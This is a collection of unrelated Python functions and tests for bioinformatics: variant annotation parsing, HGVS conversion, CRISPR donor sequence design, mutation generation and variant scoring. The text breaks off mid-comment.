Conversion from ensembl to refseq\n # ensembl_to_refseq is a dictionary with ensembl transcript id as keys and\n # a list of refseq ids as values\n ensembl_to_refseq = {}\n for gene_info in variant['info_dict'].get(\n 'Ensembl_transcript_to_refseq_transcript', []):\n splitted_gene = gene_info.split(':')\n transcript_info = splitted_gene[1]\n for transcript in transcript_info.split('|'):\n splitted_transcript = transcript.split('>')\n if len(splitted_transcript) > 1:\n ensembl_id = splitted_transcript[0]\n refseq_ids = splitted_transcript[1].split('/')\n ensembl_to_refseq[ensembl_id] = refseq_ids\n \n # A dictionary with clinical gene descriptions\n gene_descriptions = {}\n for gene_info in variant['info_dict'].get('Gene_description', []):\n splitted_gene = gene_info.split(':')\n hgnc_symbol = splitted_gene[0]\n description = splitted_gene[1]\n gene_descriptions[hgnc_symbol] = description\n \n # First we get all vep entrys that we find and put them under their \n # corresponding gene symbol in 'genes'\n for vep_entry in variant['vep_info'].get(variant['ALT'], []):\n transcript = get_transcript(vep_entry, ensembl_to_refseq)\n hgnc_symbol = transcript.hgnc_symbol\n if hgnc_symbol:\n if hgnc_symbol in genes:\n genes[hgnc_symbol]['transcripts'][transcript.transcript_id] = transcript\n for functional_annotation in transcript.functional_annotations:\n new_rank = SO_TERMS[functional_annotation]['rank']\n if new_rank < genes[hgnc_symbol]['best_rank']:\n genes[hgnc_symbol]['best_rank'] = new_rank\n genes[hgnc_symbol]['most_severe_transcript'] = transcript\n genes[hgnc_symbol]['most_severe_function'] = functional_annotation\n \n else:\n genes[hgnc_symbol] = {}\n genes[hgnc_symbol]['transcripts'] = {}\n 
genes[hgnc_symbol]['transcripts'][transcript.transcript_id] = transcript\n genes[hgnc_symbol]['most_severe_transcript'] = transcript\n genes[hgnc_symbol]['omim_gene_id'] = None\n genes[hgnc_symbol]['phenotypic_terms'] = []\n genes[hgnc_symbol]['best_rank'] = 40\n genes[hgnc_symbol]['ensembl_id'] = transcript.ensembl_id\n \n for functional_annotation in transcript.functional_annotations:\n new_rank = SO_TERMS[functional_annotation]['rank']\n if new_rank < genes[hgnc_symbol]['best_rank']:\n genes[hgnc_symbol]['best_rank'] = new_rank\n genes[hgnc_symbol]['most_severe_function'] = functional_annotation\n \n \n ######################################################################\n ## There are two types of OMIM terms, one is the OMIM gene entry ##\n ## and one is for the phenotypic terms. ##\n ## Each key in the 'omim_terms' dictionary reprecents a gene id. ##\n ## Values are a dictionary with 'omim_gene_id' = omim_gene_id and ##\n ## 'phenotypic_terms' = [list of OmimPhenotypeObjects] ##\n ######################################################################\n\n # Fill the omim gene id:s:\n for annotation in variant['info_dict'].get('OMIM_morbid', []):\n if annotation:\n splitted_record = annotation.split(':')\n try:\n hgnc_symbol = splitted_record[0]\n omim_term = splitted_record[1]\n genes[hgnc_symbol]['omim_gene_id'] = omim_term\n except (ValueError, KeyError):\n pass\n\n # Fill the omim phenotype terms:\n for gene_annotation in variant['info_dict'].get('Phenotypic_disease_model', []):\n if gene_annotation:\n splitted_gene = gene_annotation.split(':')\n hgnc_symbol = splitted_gene[0]\n for omim_entry in splitted_gene[1].split('|'):\n splitted_record = omim_entry.split('>')\n \n phenotype_id = splitted_record[0]\n inheritance_patterns = []\n if len(splitted_record) > 1:\n inheritance_patterns = splitted_record[1].split('/')\n \n disease_model = PhenotypeTerm(\n phenotype_id=phenotype_id,\n disease_models=inheritance_patterns\n )\n \n genes[hgnc_symbol]['phenotypic_terms'].append(disease_model)\n \n for hgnc_symbol in genes:\n gene_info = genes[hgnc_symbol]\n most_severe = gene_info['most_severe_transcript']\n # Create a mongo engine gene object for each gene found in the variant\n mongo_gene = Gene(hgnc_symbol=hgnc_symbol)\n mongo_gene.description = gene_descriptions.get(hgnc_symbol)\n mongo_gene.ensembl_gene_id = gene_info.get('ensembl_id', None)\n mongo_gene.omim_gene_entry = gene_info.get(\n 'omim_gene_id', \n None\n )\n\n mongo_gene.omim_phenotypes = gene_info.get(\n 'phenotypic_terms', \n []\n )\n\n # Add a list with the transcripts:\n mongo_gene.transcripts = []\n for transcript_id in gene_info['transcripts']:\n mongo_gene.transcripts.append(gene_info['transcripts'][transcript_id])\n\n try:\n mongo_gene.functional_annotation = gene_info['most_severe_function']\n except AttributeError:\n pass\n try:\n mongo_gene.region_annotation = SO_TERMS[mongo_gene.functional_annotation]['region']\n except AttributeError:\n pass\n try:\n mongo_gene.sift_prediction = most_severe.sift_prediction\n except AttributeError:\n pass\n try:\n mongo_gene.polyphen_prediction = most_severe.polyphen_prediction\n except AttributeError:\n pass\n # Add the mongo engine gene to the dictionary\n mongo_genes.append(mongo_gene)\n\n return mongo_genes", "def __getitem__(self, index):\n # NOTE: this automatically supports slicing :-)\n return self._main._sequence[index]", "def test_mut_replace_terminal(self):\n ind1 = self.individuals[self.ind_strings[1]]\n self._test_mutation(ind1, mut_replace_terminal, 
self._mut_replace_terminal_is_applied)", "def get_genome_hgvs(genome_build, ref_seq, cdna_hgvs):\n query = \"{refseq}:{cdna}\".format(refseq=ref_seq, cdna=cdna_hgvs)\n url = \"https://mutalyzer.nl/services/?wsdl\"\n\n client = Client(url, cache=None)\n response = client.service.numberConversion(genome_build, query)\n find_hgvs = re.search(\"\\\".*\\\"\", str(response))\n if find_hgvs:\n genome_hgvs = find_hgvs.group(0)[1:-1]\n else:\n genome_hgvs = \"\"\n\n return genome_hgvs", "def get_variants_by_protein(self, _transcript_id):\n try:\n p = self.proteins[_transcript_id]\n var = []\n fs = []\n shift = 0\n for start_pos in self.proteinPos[_transcript_id]:\n for i in xrange(start_pos):\n for v in p.vars.get(i, []):\n if v.type in [VariationType.FSDEL, VariationType.FSINS]:\n shift = (v.get_shift()+shift) % 3\n if shift:\n fs.append(v)\n else:\n fs = []\n for j in xrange(start_pos, start_pos+len(self)):\n for v in p.vars.get(j, []):\n var.append(v)\n fs.extend(var)\n return fs\n except KeyError:\n raise ValueError(\"Peptide does not origin from protein with \"\n \"transcript ID {transcript}\".format(transcript=_transcript_id))", "def get_donor_mut_for_guide(self, guides_df, guide_id, donor_mut_type, num_donor_variants = 1,\n mut_pos_in_guide = None, donor_length=100,donor_seq_offset=0, set_name = \"\",\n min_dist_cut_to_donor_edge = 30, do_revcomp_donor = False,\n scramble_guide_and_donor = False):\n \n #print '++++++++++++++++++++++++++1'\n #print guides_df[guides_df['guide_id'] == guide_id]\n #print '++++++++++++++++++++++++++2'\n \n ################################\n # extracting guide details\n ################################\n \n # single row of the guide\n guides_df = guides_df[guides_df['guide_id'] == guide_id]\n\n guide_gene = str(guides_df['Gene'].iloc[0])\n guide_cut_chr_pos = int(guides_df['guide_cut_chr_pos'].iloc[0])\n guide0_chr_pos = int(guides_df['guide0_chr_pos'].iloc[0])\n guide_is_negative_strand = (guides_df['guide_strand'].iloc[0] == '-')\n \n guide_cut_gene_aa_pos = int(guides_df['guide_cut_gene_aa_pos'].iloc[0])\n guide_cut_gene_aa_frame = int(guides_df['guide_cut_gene_aa_frame'].iloc[0])\n \n \n # TODO currently only mut_pos_in_guide = None is implemented which uses the cut site position and frame\n if mut_pos_in_guide is not None and not np.isnan(mut_pos_in_guide):\n #raise ValueError(\"get_donor_mut_for_guide: only None (cut site) is implemented for mut_pos_in_guide:\" + str(mut_pos_in_guide))\n # should take gene and guide orientations into account\n \n \n mut_pos_in_guide = int(mut_pos_in_guide)\n \n #DEBUG\n #print 'mutation postion in guide %d' % (mut_pos_in_guide) \n \n cut_nt_pos_in_guide = -self.CRISPR_CUT_INDEX\n if (not self.is_neg_strand() and guide_is_negative_strand) or (self.is_neg_strand() and not guide_is_negative_strand):\n cut_nt_pos_in_guide = int(-self.CRISPR_CUT_INDEX - 1)\n \n #DEBUG\n #print \"cut pos in guide %d\" % (cut_nt_pos_in_guide)\n \n edit_pos2cut_gene_nt_diff = -mut_pos_in_guide + cut_nt_pos_in_guide\n edit_pos2cut_chr_pos_diff = -mut_pos_in_guide + cut_nt_pos_in_guide\n\n if (not self.is_neg_strand() and not guide_is_negative_strand) or (self.is_neg_strand() and guide_is_negative_strand):\n edit_pos2cut_gene_nt_diff = -edit_pos2cut_gene_nt_diff\n \n if (not guide_is_negative_strand):\n edit_pos2cut_chr_pos_diff = -edit_pos2cut_chr_pos_diff\n edit_chr_pos = guide0_chr_pos + mut_pos_in_guide\n else:\n edit_chr_pos = guide0_chr_pos - mut_pos_in_guide\n \n \n #DEBUG\n #print \"edit_pos2cut_gene_nt_diff %d\" % 
(edit_pos2cut_gene_nt_diff)\n #print \"edit_pos2cut_chr_pos_diff %d\" % (edit_pos2cut_chr_pos_diff)\n #print \"guide0_chr_pos %d \" % (guide0_chr_pos)\n #print \"guide_cut_chr_pos %d \" % (guide_cut_chr_pos)\n #print \"edit_chr_pos %d\" % (edit_chr_pos)\n \n \n edit_aa_pos = guide_cut_gene_aa_pos + np.floor((guide_cut_gene_aa_frame+edit_pos2cut_gene_nt_diff)/3) \n edit_aa_frame = np.remainder(guide_cut_gene_aa_frame+edit_pos2cut_gene_nt_diff,3)\n \n else:\n edit_chr_pos = guide_cut_chr_pos\n edit_aa_pos = guide_cut_gene_aa_pos\n edit_aa_frame = guide_cut_gene_aa_frame\n edit_pos2cut_chr_pos_diff = 0\n \n #DEBUG\n #print \"-----------mut in cut\"\n \n # parsing frameshift mutation type\n donor_mut_type_splt = donor_mut_type.split('_')\n donor_mut_name = donor_mut_type_splt[0]\n if (len(donor_mut_type_splt)>1):\n donor_mut_subtype = donor_mut_type_splt[1]\n if (len(donor_mut_type_splt)>2):\n if (donor_mut_name == 'frameshift'):\n donor_mut_len = int(donor_mut_type_splt[2])\n else:\n donor_mut_infoStr = donor_mut_type_splt[2]\n \n \n ######################################\n # allocating out dataframe\n ######################################\n out_guide_donor_df = pd.DataFrame(data=None)\n \n # flag of the donor strand (should match the guide so we first create the donor and then fix the orientation)\n is_donor_revcomp = False\n donor_seq = Seq(\"\", generic_dna)\n \n if (donor_mut_name == 'frameshift'):\n \n if (donor_mut_subtype == \"in\"): # insertion\n # num of nt to add left and right (-1 for the cut nucleotide, -donor_mut_len for the added nucleotide)\n donor_nt_add_left = int( np.floor((donor_length-donor_mut_len+edit_pos2cut_chr_pos_diff)/2) - donor_seq_offset)\n donor_nt_add_right = int((donor_length-1-donor_mut_len) - donor_nt_add_left)\n \n if (donor_nt_add_left < min_dist_cut_to_donor_edge or donor_nt_add_right < min_dist_cut_to_donor_edge):\n warnings.warn(\"Insert to big %d, there are not enough overlap with genome left: %d, right: %d - NOT returning \" % (donor_mut_len, donor_nt_add_left, donor_nt_add_right))\n else:\n \n # generate insertion sequences\n insert_seqs, insert_seqs_num_requested_ok = get_K_random_dna_nts(donor_mut_len,num_donor_variants)\n\n if not insert_seqs_num_requested_ok:\n warnings.warn(\"can not create that num_donor_variants: \" + str(num_donor_variants) + \" of DNA length donor_mut_len:\" + str(donor_mut_len))\n \n # DEBUG\n #print str(int(np.floor((donor_length-1-donor_mut_len)/2) + donor_seq_offset + edit_pos2cut_chr_pos_diff))\n \n #print edit_chr_pos\n #print type(edit_chr_pos)\n #print donor_nt_add_left\n #print type(donor_nt_add_left)\n #print donor_nt_add_right\n #print type(donor_nt_add_right)\n \n\n for idx,cur_insert_seq in enumerate(insert_seqs):\n # TODO ? make sure that does not create a stop codon? 
may be not because also cutting can create that\n if (self.is_neg_strand()):\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos+1)] + \\\n cur_insert_seq + \\\n self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)]\n else:\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos)] + \\\n cur_insert_seq + \\\n self.genome_seq[self.chrom].seq[edit_chr_pos: (edit_chr_pos + donor_nt_add_right + 1)]\n \n # DEBUG\n #print cur_insert_seq\n #print donor_seq\n \n \n donor_info_str = \"in:\" + str(cur_insert_seq)\n \n \n # convert to match the guide orientation\n if (guide_is_negative_strand):\n donor_seq = donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n donor_seq = donor_seq.reverse_complement()\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n \n \n \n # appending to donor sequences matrix\n cur_donor_line = pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series( donor_info_str ),\n 'set_name' : pd.Series(str(set_name)) })\n \n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line)\n \n elif (donor_mut_subtype == \"del\"): # deletion (currently only deletion after the cut (in term of the gene) are implemented)\n \n \n print \" ------ In del --------------\"\n \n if num_donor_variants != 1:\n raise ValueError(\"Currently a deletion can produce only a single varient: \" + str(num_donor_variants))\n else:\n idx = 0\n \n if (self.is_neg_strand()):\n left_side_deletion = int(np.floor(donor_mut_len/2))\n else:\n left_side_deletion = int(np.ceil(donor_mut_len/2))\n right_side_deletion = int(donor_mut_len - left_side_deletion)\n \n # num of nt to add left and right (-1 for the cut nucleotide, +donor_mut_len for the deleted nucleotide)\n donor_nt_add_left = int(np.floor(donor_length/2)) # + edit_pos2cut_chr_pos_diff + donor_seq_offset\n donor_nt_add_right = int(donor_length - donor_nt_add_left)\n \n cur_donor_offset = int(np.floor(edit_pos2cut_chr_pos_diff/2 + donor_seq_offset))\n \n \n #print \"donor_mut_len: %d\" % (donor_mut_len)\n #print \"right_side_deletion: %d\" % (right_side_deletion)\n #print \"donor_nt_add_left: %d\" % (donor_nt_add_left)\n #print \"donor_nt_add_right: %d\" % (donor_nt_add_right)\n #print \"edit_pos2cut_chr_pos_diff: %d\" % (edit_pos2cut_chr_pos_diff)\n #print \"donor_seq_offset: %d\" % (donor_seq_offset)\n #print \"cur_donor_offset: %d\" % (cur_donor_offset)\n \n # TODO ? make sure that does not create a stop codon? 
may be not because also cutting can create that\n # deleting downstream to the cut\n #if (self.is_neg_strand()):\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos-donor_mut_len)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)] \n \n #else:\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left-left_side_deletion+cur_donor_offset):(edit_chr_pos-left_side_deletion+1)] + \\\n self.genome_seq[self.chrom].seq[(edit_chr_pos+1+right_side_deletion): (edit_chr_pos + 1 + right_side_deletion + donor_nt_add_right + cur_donor_offset)]\n\n #if (self.is_neg_strand()):\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos+1-donor_mut_len)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)]\n #else:\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+donor_mut_len): (edit_chr_pos + donor_nt_add_right + 1)]\n \n #print str(self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left-left_side_deletion+cur_donor_offset+1):(edit_chr_pos-left_side_deletion+1)])\n #print str(self.genome_seq[self.chrom].seq[(edit_chr_pos+1+right_side_deletion): (edit_chr_pos + 1 + right_side_deletion + donor_nt_add_right + cur_donor_offset)])\n \n #print \"donor seq:\"\n #print str(donor_seq)\n\n\n\n # convert to match the guide orientation\n if (guide_is_negative_strand):\n donor_seq = donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n donor_seq = donor_seq.reverse_complement()\n \n \n donor_info_str = \"del:\" + str(donor_mut_len)\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n\n # appending to donor sequences matrix\n cur_donor_line = pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series(donor_info_str),\n 'set_name' : pd.Series(str(set_name)) })\n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line,ignore_index=True)\n \n else:\n raise ValueError('get_donor_mut_for_guide unknown donor_mut_subtype:' + donor_mut_subtype)\n \n \n elif (donor_mut_name == 'synonymous' or donor_mut_name == 'nonsynonymous' or\n donor_mut_name == 'nonsense' or donor_mut_name == 'stop2aa' or\n donor_mut_name == '1bp'):\n \n # num of nt to add left and right (-3 for the codon)\n donor_nt_add_left = int(np.floor((donor_length + edit_pos2cut_chr_pos_diff)/2) - donor_seq_offset)\n donor_nt_add_right = int((donor_length-1) - donor_nt_add_left)\n \n org_donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos + donor_nt_add_right + 1)]\n \n # num of nts before the cut \n if (self.is_neg_strand()):\n nt_before_cut = donor_nt_add_right\n org_donor_seq = org_donor_seq.reverse_complement()\n else:\n nt_before_cut = donor_nt_add_left\n \n # the relevant codon is where the cut is or downstream to the cut\n i_first_nt_in_codon = 
(nt_before_cut-edit_aa_frame)\n cut_codon_dna_seq = org_donor_seq[(i_first_nt_in_codon):(i_first_nt_in_codon+3)]\n \n # the original codon\n #print \"XXXXXXXX1\"\n #print cut_codon_dna_seq\n #print nt_before_cut\n #print guide_cut_gene_aa_frame\n #print i_first_nt_in_codon\n #print edit_chr_pos\n #print donor_nt_add_left\n #print donor_seq_offset\n #print nt_before_cut\n #print self.chrom\n #print org_donor_seq\n #print (edit_chr_pos-donor_nt_add_left)\n #print (edit_chr_pos + donor_nt_add_right + 1)\n \n \n #DEBUG print\n #print type(cut_codon_dna_seq)\n #print str(cut_codon_dna_seq)\n \n org_codon = AminoAcidCodon(cut_codon_dna_seq)\n \n # getting synonymous mutations sequences\n if (donor_mut_name == 'synonymous'):\n if org_codon.is_start_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do synonymous mutations in a start codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_synonymous_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'nonsynonymous'):\n if org_codon.is_start_codon() or org_codon.is_stop_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do nonsynonymous mutations in a start/stop codons. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_nonsynonymous_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'nonsense'):\n if org_codon.is_stop_codon(): # this should happen only if early stop codon exist\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do nonesense mutations in a stop codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_nonsense_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'stop2aa'):\n if not org_codon.is_stop_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do stop2aa mutations not in a stop codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_stop2aa_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == '1bp'):\n \n # donor_mut_infoStr, donor_mut_subtype\n # nonsense_requiresOptionalSynonymous\n # 1bp_synonymous_requiresOptionalNonesense\n \n # this should happen only if early stop codon exist\n if ( ( (donor_mut_subtype == 'nonsense' and donor_mut_infoStr == \"requiresOptionalSynonymous\") or\n (donor_mut_subtype == 'synonymous' and donor_mut_infoStr == \"requiresOptionalNonesense\") or\n (donor_mut_subtype == 'nonsynonymous' and donor_mut_infoStr == \"requiresOptionalNonesenseAndSynonymous\") ) and #requires that the codon can be mutated in the position to syn/nonsense\n (not org_codon.is_mutable_2_synonymous_and_nonsese(edit_aa_frame) ) ):\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do both synonymous and nonesense mutations in this codon. 
codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n \n if (donor_mut_subtype == 'synonymous'):\n codons, num_requested_ok = org_codon.get_K_synonymous_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n elif (donor_mut_subtype == 'nonsynonymous'):\n codons, num_requested_ok = org_codon.get_K_nonsynonymous_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n elif (donor_mut_subtype == 'nonsense'):\n codons, num_requested_ok = org_codon.get_K_nonsense_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n else:\n raise ValueError(\"get_donor_mut_for_guide - unknown mutation name:\" + donor_mut_name)\n \n \n else:\n raise ValueError(\"get_donor_mut_for_guide - unknown 1bp mutation subtype name:\" + donor_mut_subtype)\n \n if not num_requested_ok:\n warnings.warn(\"can not create that num_donor_variants: \" + str(num_donor_variants) + \" \" + donor_mut_name + \" mutations for codon:\" + str(cut_codon_dna_seq))\n \n \n for idx,alt_codon in enumerate(codons):\n alt_donor_seq = org_donor_seq[0:i_first_nt_in_codon] + \\\n alt_codon + \\\n org_donor_seq[(i_first_nt_in_codon+3):len(org_donor_seq)]\n \n\n # convert to match the guide orientation\n if ( (not guide_is_negative_strand and self.is_neg_strand()) or (guide_is_negative_strand and not self.is_neg_strand()) ):\n alt_donor_seq = alt_donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n alt_donor_seq = alt_donor_seq.reverse_complement()\n \n donor_info_str = donor_mut_name + \":\" + \\\n str(cut_codon_dna_seq) + \">\" + str(alt_codon) + \":\" + \\\n org_codon.get_aa_seq() + \">\" + org_codon.get_codon_aa_seq(alt_codon)\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(alt_donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n alt_donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n\n # appending to donor sequences matrix\n cur_donor_line = pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(alt_donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series(donor_info_str),\n 'set_name' : pd.Series(str(set_name)) })\n \n \n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line,ignore_index=True)\n\n else:\n raise ValueError('get_donor_mut_for_guide unknown donor_mut_type:' + donor_mut_type + \" and donor_mut_name:\" + donor_mut_name)\n \n\n return(out_guide_donor_df.reset_index(drop=True))", "def generate_mutation(base):\n\tif base in ['A', 'C', 'G', 'T']:\n\t\tbases = ['A', 'C', 'G', 'T']\n\t\tbases.remove(base)\n\t\treturn np.random.choice(bases)\n\telse:\n\t\traise Exception('base is not a proper DNA nucleotide (ACGT).')", "def __call__(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n if variant and item:\n mut_dat = self._get_variant(mut_dat, variant, item, all_except=all_except) #get specific variant\n else:\n try:\n mut_dat = self._get_variant(mut_dat, \"Variant_Classification\", \"Silent\", all_except=True)\n except AssertionError:\n pass\n\n cases = {\"gene\": self._single_entity_mutated, #dict of functions to used based on version of 
handler being used\n \"line\": self._single_entity_mutated,\n \"canc\": self._multiple_entity_mutated,\n \"org\": self._multiple_entity_mutated}\n\n return cases[self.version](mut_dat, output, variant, item, translocations, fusions, all_except) #get mutations", "async def test_coding_dna_silent_mutation(test_handler,\n coding_dna_silent_mutation,\n braf_gene_context):\n resp = await test_handler.normalize(\"NM_004333.4:c.1799= \")\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"NM_004333.4:c.1799=\")\n\n fixture_id = \"normalize.variation:NM_004333.4%3Ac.1799%3D\"\n\n resp = await test_handler.normalize(\"ENST00000288602.11:c.1799=\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:ENST00000288602.11%3Ac.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"ENST00000288602.11:c.1799=\")\n\n # TODO: What to do for older Ensembl transcripts that aren\"t found\n # in seqrepo or UTA\n # resp = await test_handler.normalize(\"ENST00000288602.6:c.1799=\")\n # assert_coding_dna_genomic_silent_mutation(resp, braf_gene_context,\n # 1798, 1799)\n # assert resp.variation_descriptor.id == \"normalize.variation:ENST00000288602.6%3Ac.1799%3D\" # noqa: E501\n # assert resp.variation_descriptor.label == \"ENST00000288602.6:c.1799=\"\n # assert resp.variation_descriptor.molecule_context == \"transcript\"\n\n resp = await test_handler.normalize(\"BRAF c.1799=\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20c.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"BRAF c.1799=\")\n\n resp = await test_handler.normalize(\" BRAF V600E c.1799= \")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20c.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"BRAF V600E c.1799=\")", "def match_variants(self,state,variants):\r\n for v in variants:\r\n terms = self.match_variant(state,v)\r\n if terms is not None:\r\n return terms\r\n return None", "def __getitem__(self, index):\n return self.seq[index]", "def delta_prob_raw(variants, tx, clf1, clf2, model='cterm', is_sum=True):\n # fetch c-terminal sequence\n term_seq = [] ; vars_considered = []\n for v in variants:\n if v.mutant_protein_sequence:\n if model=='cterm' and type(v) in utils.indels+utils.nmd_sub_vars:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif type(v) in utils.base_substitutions:\n if model=='cterm' and v.aa_mutation_start_offset>(len(v.transcript.protein_sequence) - 23):\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif model=='nterm' and v.aa_mutation_start_offset<=24:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n\n # return None if no variants\n if not term_seq:\n if is_sum: return 0\n else: return [], [], []\n # return None if U in protein sequence\n if 'U' in utils.fetch_seq(tx.protein_sequence, model=model):\n if is_sum: return 0\n else: return [], [], []\n\n # construct dataframe\n result_df = pd.DataFrame({'seq': term_seq})\n\n # create feature matrix\n X = compute_feature_matrix(result_df['seq'], 6, dinuc=True, model=model)\n X2 = compute_feature_matrix(result_df['seq'], 0, dinuc=False, 
model=model)\n\n # predict scores\n result_df['prob'] = clf1.predict_proba(X)[:, 0]\n\n # adjust for baseline score\n wt_seq = utils.fetch_seq(tx.protein_sequence, model=model)\n wt_df = pd.DataFrame({'seq': [wt_seq]})\n # create feature matrix\n X = compute_feature_matrix(wt_df['seq'], 6, dinuc=True, model=model)\n wt_df['prob'] = clf1.predict_proba(X)[:, 0]\n baseline = wt_df['prob'].iloc[0]\n\n # add up scores\n tmp = result_df['prob'] - baseline\n if is_sum:\n prob_sum = tmp.sum()\n return prob_sum\n else:\n return vars_considered, tmp, result_df['prob']", "def __call__(self, mutant, rng):\n raise NotImplementedError", "def find_variants(self, variants, gene, family):\n \n # get the inheritance for the gene (monoalleleic, biallelic, hemizygous\n # etc), but allow for times when we haven't specified a list of genes\n # to use\n known_gene = None\n gene_inh = None\n if self.known_genes is not None and gene in self.known_genes:\n known_gene = self.known_genes[gene]\n gene_inh = known_gene['inh']\n \n chrom_inheritance = variants[0].get_inheritance_type()\n \n # If we are looking for variants in a set of known genes, and the gene\n # isn't part of that set, then we don't ant to examine the variant for\n # that gene, UNLESS the variant is a CNV, since CNVs can be included\n # purely from size thresholds, regardless of which gene they 